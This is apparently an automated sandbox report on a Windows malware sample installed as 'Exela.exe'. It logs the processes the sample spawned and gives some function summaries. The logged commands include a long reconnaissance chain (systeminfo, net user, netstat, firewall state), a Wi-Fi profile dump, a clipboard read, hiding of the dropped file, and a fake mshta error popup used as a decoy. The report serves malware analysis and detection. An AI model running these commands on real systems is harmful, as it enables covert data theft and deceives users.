Commandline:	wmic computersystem get Manufacturer
Imagebase:	0x7ff68b4c0000
File size:	576'000 bytes
MD5 hash:	C37F2F4F4B3CD128BDABCAEB2266A785
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	22
Start time:	06:50:06
Start date:	13/01/2024
Path:	C:\Windows\System32\tasklist.exe
Wow64 process (32bit):	false
Commandline:	tasklist
Imagebase:	0x7ff6b3960000
File size:	106'496 bytes
MD5 hash:	D0A49A170E13D7F6AEBBEFED9DF88AAA
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	23
Start time:	06:50:08
Start date:	13/01/2024
Path:	C:\Windows\System32\cmd.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\cmd.exe /c "wmic path Win32_ComputerSystem get Manufacturer"
Imagebase:	0x7ff746fb0000
File size:	289'792 bytes
MD5 hash:	8A2122E8162DBEF04694B9C3E0B6CDEE
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	24
Start time:	06:50:08
Start date:	13/01/2024
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff75da10000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	25
Start time:	06:50:08
Start date:	13/01/2024
Path:	C:\Windows\System32\wbem\WMIC.exe
Wow64 process (32bit):	false
Commandline:	wmic path Win32_ComputerSystem get Manufacturer
Imagebase:	0x7ff68b4c0000
File size:	576'000 bytes
MD5 hash:	C37F2F4F4B3CD128BDABCAEB2266A785
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	26
Start time:	06:50:09
Start date:	13/01/2024
Path:	C:\Windows\System32\cmd.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\cmd.exe /c "wmic csproduct get uuid"
Imagebase:	0x7ff746fb0000
File size:	289'792 bytes
MD5 hash:	8A2122E8162DBEF04694B9C3E0B6CDEE
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	27
Start time:	06:50:09
Start date:	13/01/2024
Path:	C:\Windows\System32\cmd.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\cmd.exe /c "tasklist"
Imagebase:	0x7ff746fb0000
File size:	289'792 bytes
MD5 hash:	8A2122E8162DBEF04694B9C3E0B6CDEE
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Analysis Process: conhost.exePID: 7952, Parent PID: 7936

General

Target ID:	28
Start time:	06:50:09
Start date:	13/01/2024
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff75da10000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	29
Start time:	06:50:09
Start date:	13/01/2024
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff75da10000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	30
Start time:	06:50:09
Start date:	13/01/2024
Path:	C:\Windows\System32\wbem\WMIC.exe
Wow64 process (32bit):	false
Commandline:	wmic csproduct get uuid
Imagebase:	0x7ff68b4c0000
File size:	576'000 bytes
MD5 hash:	C37F2F4F4B3CD128BDABCAEB2266A785
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	31
Start time:	06:50:09
Start date:	13/01/2024
Path:	C:\Windows\System32\tasklist.exe
Wow64 process (32bit):	false
Commandline:	tasklist
Imagebase:	0x7ff6b3960000
File size:	106'496 bytes
MD5 hash:	D0A49A170E13D7F6AEBBEFED9DF88AAA
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	33
Start time:	06:50:11
Start date:	13/01/2024
Path:	C:\Windows\System32\cmd.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\cmd.exe /c "attrib +h +s "C:\Users\user\AppData\Local\ExelaUpdateService\Exela.exe""
Imagebase:	0x7ff746fb0000
File size:	289'792 bytes
MD5 hash:	8A2122E8162DBEF04694B9C3E0B6CDEE
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	34
Start time:	06:50:11
Start date:	13/01/2024
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff75da10000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	35
Start time:	06:50:11
Start date:	13/01/2024
Path:	C:\Windows\System32\attrib.exe
Wow64 process (32bit):	false
Commandline:	attrib +h +s "C:\Users\user\AppData\Local\ExelaUpdateService\Exela.exe"
Imagebase:	0x7ff716d90000
File size:	23'040 bytes
MD5 hash:	5037D8E6670EF1D89FB6AD435F12A9FD
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	36
Start time:	06:50:12
Start date:	13/01/2024
Path:	C:\Windows\System32\cmd.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\cmd.exe /c "mshta "javascript:var sh=new ActiveXObject('WScript.Shell'); sh.Popup('The Program can\x22t start because api-ms-win-crt-runtime-\|l1-1-.dll is missing from your computer. Try reinstalling the program to fix this problem', 0, 'System Error', 0+16);close()""
Imagebase:	0x7ff746fb0000
File size:	289'792 bytes
MD5 hash:	8A2122E8162DBEF04694B9C3E0B6CDEE
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	37
Start time:	06:50:12
Start date:	13/01/2024
Path:	C:\Windows\System32\cmd.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\cmd.exe /c "tasklist"
Imagebase:	0x7ff746fb0000
File size:	289'792 bytes
MD5 hash:	8A2122E8162DBEF04694B9C3E0B6CDEE
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Analysis Process: conhost.exePID: 1476, Parent PID: 5060

General

Target ID:	38
Start time:	06:50:12
Start date:	13/01/2024
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff75da10000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	39
Start time:	06:50:12
Start date:	13/01/2024
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff75da10000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	40
Start time:	06:50:12
Start date:	13/01/2024
Path:	C:\Windows\System32\mshta.exe
Wow64 process (32bit):	false
Commandline:	mshta "javascript:var sh=new ActiveXObject('WScript.Shell'); sh.Popup('The Program can\x22t start because api-ms-win-crt-runtime-\|l1-1-.dll is missing from your computer. Try reinstalling the program to fix this problem', 0, 'System Error', 0+16);close()"
Imagebase:	0x7ff743e10000
File size:	14'848 bytes
MD5 hash:	0B4340ED812DC82CE636C00FA5C9BEF2
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	41
Start time:	06:50:12
Start date:	13/01/2024
Path:	C:\Windows\System32\tasklist.exe
Wow64 process (32bit):	false
Commandline:	tasklist
Imagebase:	0x7ff6b3960000
File size:	106'496 bytes
MD5 hash:	D0A49A170E13D7F6AEBBEFED9DF88AAA
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	42
Start time:	06:50:14
Start date:	13/01/2024
Path:	C:\Windows\System32\cmd.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"
Imagebase:	0x7ff746fb0000
File size:	289'792 bytes
MD5 hash:	8A2122E8162DBEF04694B9C3E0B6CDEE
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	43
Start time:	06:50:14
Start date:	13/01/2024
Path:	C:\Windows\System32\cmd.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\cmd.exe /c "powershell.exe Get-Clipboard"
Imagebase:	0x7ff746fb0000
File size:	289'792 bytes
MD5 hash:	8A2122E8162DBEF04694B9C3E0B6CDEE
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	44
Start time:	06:50:14
Start date:	13/01/2024
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff75da10000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	45
Start time:	06:50:14
Start date:	13/01/2024
Path:	C:\Windows\System32\cmd.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\cmd.exe /c "chcp"
Imagebase:	0x7ff746fb0000
File size:	289'792 bytes
MD5 hash:	8A2122E8162DBEF04694B9C3E0B6CDEE
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	46
Start time:	06:50:14
Start date:	13/01/2024
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff75da10000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	47
Start time:	06:50:14
Start date:	13/01/2024
Path:	C:\Windows\System32\cmd.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\cmd.exe /c "chcp"
Imagebase:	0x7ff746fb0000
File size:	289'792 bytes
MD5 hash:	8A2122E8162DBEF04694B9C3E0B6CDEE
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Analysis Process: conhost.exePID: 4828, Parent PID: 7536

General

Target ID:	48
Start time:	06:50:14
Start date:	13/01/2024
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff75da10000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	49
Start time:	06:50:14
Start date:	13/01/2024
Path:	C:\Windows\System32\tasklist.exe
Wow64 process (32bit):	false
Commandline:	tasklist /FO LIST
Imagebase:	0x7ff6b3960000
File size:	106'496 bytes
MD5 hash:	D0A49A170E13D7F6AEBBEFED9DF88AAA
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	50
Start time:	06:50:14
Start date:	13/01/2024
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff75da10000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	51
Start time:	06:50:15
Start date:	13/01/2024
Path:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
Wow64 process (32bit):	false
Commandline:	powershell.exe Get-Clipboard
Imagebase:	0x7ff741d30000
File size:	452'608 bytes
MD5 hash:	04029E121A0CFA5991749937DD22A1D9
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	.Net C# or VB.NET
Has exited:	true

Show Windows behavior

Target ID:	52
Start time:	06:50:15
Start date:	13/01/2024
Path:	C:\Windows\System32\chcp.com
Wow64 process (32bit):	false
Commandline:	chcp
Imagebase:	0x7ff6bf2a0000
File size:	14'848 bytes
MD5 hash:	33395C4732A49065EA72590B14B64F32
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	53
Start time:	06:50:15
Start date:	13/01/2024
Path:	C:\Windows\System32\chcp.com
Wow64 process (32bit):	false
Commandline:	chcp
Imagebase:	0x7ff6bf2a0000
File size:	14'848 bytes
MD5 hash:	33395C4732A49065EA72590B14B64F32
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	54
Start time:	06:50:15
Start date:	13/01/2024
Path:	C:\Windows\System32\cmd.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\cmd.exe /c "echo ####System Info#### & systeminfo & echo ####System Version#### & ver & echo ####Host Name#### & hostname & echo ####Environment Variable#### & set & echo ####Logical Disk#### & wmic logicaldisk get caption,description,providername & echo ####User Info#### & net user & echo ####Online User#### & query user & echo ####Local Group#### & net localgroup & echo ####Administrators Info#### & net localgroup administrators & echo ####Guest User Info#### & net user guest & echo ####Administrator User Info#### & net user administrator & echo ####Startup Info#### & wmic startup get caption,command & echo ####Tasklist#### & tasklist /svc & echo ####Ipconfig#### & ipconfig/all & echo ####Hosts#### & type C:\WINDOWS\System32\drivers\etc\hosts & echo ####Route Table#### & route print & echo ####Arp Info#### & arp -a & echo ####Netstat#### & netstat -ano & echo ####Service Info#### & sc query type= service state= all & echo ####Firewallinfo#### & netsh firewall show state & netsh firewall show config"
Imagebase:	0x7ff746fb0000
File size:	289'792 bytes
MD5 hash:	8A2122E8162DBEF04694B9C3E0B6CDEE
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	55
Start time:	06:50:15
Start date:	13/01/2024
Path:	C:\Windows\System32\cmd.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\cmd.exe /c "netsh wlan show profiles"
Imagebase:	0x7ff746fb0000
File size:	289'792 bytes
MD5 hash:	8A2122E8162DBEF04694B9C3E0B6CDEE
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	56
Start time:	06:50:15
Start date:	13/01/2024
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff75da10000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	57
Start time:	06:50:15
Start date:	13/01/2024
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff75da10000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	58
Start time:	06:50:15
Start date:	13/01/2024
Path:	C:\Windows\System32\systeminfo.exe
Wow64 process (32bit):	false
Commandline:	systeminfo
Imagebase:	0x7ff7515f0000
File size:	110'080 bytes
MD5 hash:	EE309A9C61511E907D87B10EF226FDCD
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	59
Start time:	06:50:15
Start date:	13/01/2024
Path:	C:\Windows\System32\netsh.exe
Wow64 process (32bit):	false
Commandline:	netsh wlan show profiles
Imagebase:	0x7ff699be0000
File size:	96'768 bytes
MD5 hash:	6F1E6DD688818BC3D1391D0CC7D597EB
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	60
Start time:	06:50:15
Start date:	13/01/2024
Path:	C:\Windows\System32\wbem\WmiPrvSE.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding
Imagebase:	0x7ff7fb730000
File size:	496'640 bytes
MD5 hash:	60FF40CFD7FB8FE41EE4FE9AE5FE1C51
Has elevated privileges:	true
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	61
Start time:	06:50:16
Start date:	13/01/2024
Path:	C:\Windows\System32\svchost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS
Imagebase:	0x7ff7b4ee0000
File size:	55'320 bytes
MD5 hash:	B7F884C1B74A263F746EE12A5F7C9F6A
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	false

Show Windows behavior

Target ID:	62
Start time:	06:50:16
Start date:	13/01/2024
Path:	C:\Windows\System32\HOSTNAME.EXE
Wow64 process (32bit):	false
Commandline:	hostname
Imagebase:	0x7ff699e80000
File size:	14'848 bytes
MD5 hash:	33AFAA43B84BDEAB12E02F9DBD2B2EE0
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	63
Start time:	06:50:17
Start date:	13/01/2024
Path:	C:\Windows\System32\wbem\WMIC.exe
Wow64 process (32bit):	false
Commandline:	wmic logicaldisk get caption,description,providername
Imagebase:	0x7ff68b4c0000
File size:	576'000 bytes
MD5 hash:	C37F2F4F4B3CD128BDABCAEB2266A785
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	65
Start time:	06:50:20
Start date:	13/01/2024
Path:	C:\Windows\System32\net.exe
Wow64 process (32bit):	false
Commandline:	net user
Imagebase:	0x7ff7e2f70000
File size:	59'904 bytes
MD5 hash:	0BD94A338EEA5A4E1F2830AE326E6D19
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	66
Start time:	06:50:20
Start date:	13/01/2024
Path:	C:\Windows\System32\net1.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\net1 user
Imagebase:	0x7ff68a560000
File size:	183'808 bytes
MD5 hash:	55693DF2BB3CBE2899DFDDF18B4EB8C9
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	67
Start time:	06:50:21
Start date:	13/01/2024
Path:	C:\Windows\System32\query.exe
Wow64 process (32bit):	false
Commandline:	query user
Imagebase:	0x7ff720750000
File size:	17'408 bytes
MD5 hash:	29043BC0B0F99EAFF36CAD35CBEE8D45
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	68
Start time:	06:50:21
Start date:	13/01/2024
Path:	C:\Windows\System32\quser.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\quser.exe
Imagebase:	0x7ff664d10000
File size:	25'600 bytes
MD5 hash:	480868AEBA9C04CA04D641D5ED29937B
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	71
Start time:	06:50:21
Start date:	13/01/2024
Path:	C:\Windows\System32\net.exe
Wow64 process (32bit):	false
Commandline:	net localgroup
Imagebase:	0x7ff7e2f70000
File size:	59'904 bytes
MD5 hash:	0BD94A338EEA5A4E1F2830AE326E6D19
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	72
Start time:	06:50:21
Start date:	13/01/2024
Path:	C:\Windows\System32\net1.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\net1 localgroup
Imagebase:	0x7ff68a560000
File size:	183'808 bytes
MD5 hash:	55693DF2BB3CBE2899DFDDF18B4EB8C9
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	73
Start time:	06:50:22
Start date:	13/01/2024
Path:	C:\Windows\System32\net.exe
Wow64 process (32bit):	false
Commandline:	net localgroup administrators
Imagebase:	0x7ff7e2f70000
File size:	59'904 bytes
MD5 hash:	0BD94A338EEA5A4E1F2830AE326E6D19
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	74
Start time:	06:50:22
Start date:	13/01/2024
Path:	C:\Windows\System32\net1.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\net1 localgroup administrators
Imagebase:	0x7ff68a560000
File size:	183'808 bytes
MD5 hash:	55693DF2BB3CBE2899DFDDF18B4EB8C9
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	75
Start time:	06:50:22
Start date:	13/01/2024
Path:	C:\Windows\System32\net.exe
Wow64 process (32bit):	false
Commandline:	net user guest
Imagebase:	0x7ff7e2f70000
File size:	59'904 bytes
MD5 hash:	0BD94A338EEA5A4E1F2830AE326E6D19
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	96
Start time:	06:50:24
Start date:	13/01/2024
Path:	C:\Windows\System32\Conhost.exe
Wow64 process (32bit):
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:
Has administrator privileges:
Programmed in:	C, C++ or other language
Has exited:	false

Show Windows behavior

Target ID:	103
Start time:	06:50:25
Start date:	13/01/2024
Path:	C:\Windows\System32\Conhost.exe
Wow64 process (32bit):
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:
Has administrator privileges:
Programmed in:	C, C++ or other language
Has exited:	false

Show Windows behavior

Execution Graph

Execution Coverage:	12.3%
Dynamic/Decrypted Code Coverage:	0%
Signature Coverage:	20.6%
Total number of Nodes:	2000
Total number of Limit Nodes:	70

Executed Functions

Function 00007FF6850D6370 Relevance: 14.3, APIs: 6, Strings: 2, Instructions: 334
timeCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

_get_daylight.LIBCMT ref: 00007FF6850D63B5

Part of subcall function 00007FF6850D5D08: _invalid_parameter_noinfo.LIBCMT ref: 00007FF6850D5D1C

Part of subcall function 00007FF6850CAF0C: RtlRestoreThreadPreferredUILanguages.NTDLL(?,?,?,00007FF6850D3392,?,?,?,00007FF6850D33CF,?,?,00000000,00007FF6850D3895,?,?,00000000,00007FF6850D37C7), ref: 00007FF6850CAF22
Part of subcall function 00007FF6850CAF0C: GetLastError.KERNEL32(?,?,?,00007FF6850D3392,?,?,?,00007FF6850D33CF,?,?,00000000,00007FF6850D3895,?,?,00000000,00007FF6850D37C7), ref: 00007FF6850CAF2C

Part of subcall function 00007FF6850CAEC4: IsProcessorFeaturePresent.KERNEL32(?,?,?,?,00007FF6850CAEA3,?,?,?,?,?,00007FF6850C30CC), ref: 00007FF6850CAECD
Part of subcall function 00007FF6850CAEC4: GetCurrentProcess.KERNEL32(?,?,?,?,00007FF6850CAEA3,?,?,?,?,?,00007FF6850C30CC), ref: 00007FF6850CAEF2

_get_daylight.LIBCMT ref: 00007FF6850D63A4

Part of subcall function 00007FF6850D5D68: _invalid_parameter_noinfo.LIBCMT ref: 00007FF6850D5D7C

_get_daylight.LIBCMT ref: 00007FF6850D661A
_get_daylight.LIBCMT ref: 00007FF6850D662B
_get_daylight.LIBCMT ref: 00007FF6850D663C
GetTimeZoneInformation.KERNELBASE(?,?,?,?,?,?,?,?,?,00000000,?,00007FF6850D687C), ref: 00007FF6850D6663

Strings

W. Europe Summer Time, xrefs: 00007FF6850D6721
W. Europe Standard Time, xrefs: 00007FF6850D6709

Memory Dump Source

Source File: 00000000.00000002.1590412828.00007FF6850B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6850B0000, based on PE: true

Associated: 00000000.00000002.1590381182.00007FF6850B0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1590452258.00007FF6850DB000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1590487177.00007FF6850EE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1590487177.00007FF6850F0000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1590547144.00007FF6850F2000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff6850b0000_9afaXJv52z.jbxd

Similarity

API ID: _get_daylight$_invalid_parameter_noinfo$CurrentErrorFeatureInformationLanguagesLastPreferredPresentProcessProcessorRestoreThreadTimeZone
String ID: W. Europe Standard Time$W. Europe Summer Time
API String ID: 1458651798-690618308
Opcode ID: 54e1ccf0b1e099ab2aef5fd1d20d70d6c7b19d4e9a74b58f9fc53268ba567377
Instruction ID: 9f513d9a00468ea054b9d8981eac0ac53eb057ce756128400f24947c830f98e2
Opcode Fuzzy Hash: 54e1ccf0b1e099ab2aef5fd1d20d70d6c7b19d4e9a74b58f9fc53268ba567377
Instruction Fuzzy Hash: 34D18E26E08242C6E760AF26D8516B96761FF44FA4F848239EE4DC768ADF3DEC41C740

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF6850D72BC Relevance: 13.8, APIs: 9, Instructions: 276
fileCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 00007FF6850D6FF0: _invalid_parameter_noinfo.LIBCMT ref: 00007FF6850D7031
Part of subcall function 00007FF6850D6FF0: _invalid_parameter_noinfo.LIBCMT ref: 00007FF6850D70AF
Part of subcall function 00007FF6850D6FF0: _invalid_parameter_noinfo.LIBCMT ref: 00007FF6850D7100

CreateFileW.KERNELBASE ref: 00007FF6850D73C2
CreateFileW.KERNEL32 ref: 00007FF6850D7412
GetLastError.KERNEL32 ref: 00007FF6850D7442
GetFileType.KERNELBASE ref: 00007FF6850D7457
GetLastError.KERNEL32 ref: 00007FF6850D7461
CloseHandle.KERNEL32 ref: 00007FF6850D7494
CloseHandle.KERNEL32 ref: 00007FF6850D75F7
CreateFileW.KERNEL32 ref: 00007FF6850D762C
GetLastError.KERNEL32 ref: 00007FF6850D763B

Memory Dump Source

Source File: 00000000.00000002.1590412828.00007FF6850B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6850B0000, based on PE: true

Associated: 00000000.00000002.1590381182.00007FF6850B0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1590452258.00007FF6850DB000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1590487177.00007FF6850EE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1590487177.00007FF6850F0000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1590547144.00007FF6850F2000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff6850b0000_9afaXJv52z.jbxd

Similarity

API ID: File$CreateErrorLast_invalid_parameter_noinfo$CloseHandle$Type
String ID:
API String ID: 1617910340-0
Opcode ID: d1d4f06f2925cf98ba43065425f03779d4007acc0884ea13a9d80746d18551ee
Instruction ID: d493514f1e0dfae9c0499102a1857623714d491b1aea025809aaea778fb45778
Opcode Fuzzy Hash: d1d4f06f2925cf98ba43065425f03779d4007acc0884ea13a9d80746d18551ee
Instruction Fuzzy Hash: C3C19036B28A42C5EB10CF68C4906AC3761FB49BA8B415329DE2E977D5DF38D856C740

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF6850B7950 Relevance: 12.4, APIs: 3, Strings: 4, Instructions: 141
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetTempPathW.KERNEL32(00000000,?,00000000,00000000,?,00007FF6850B154F), ref: 00007FF6850B79E7

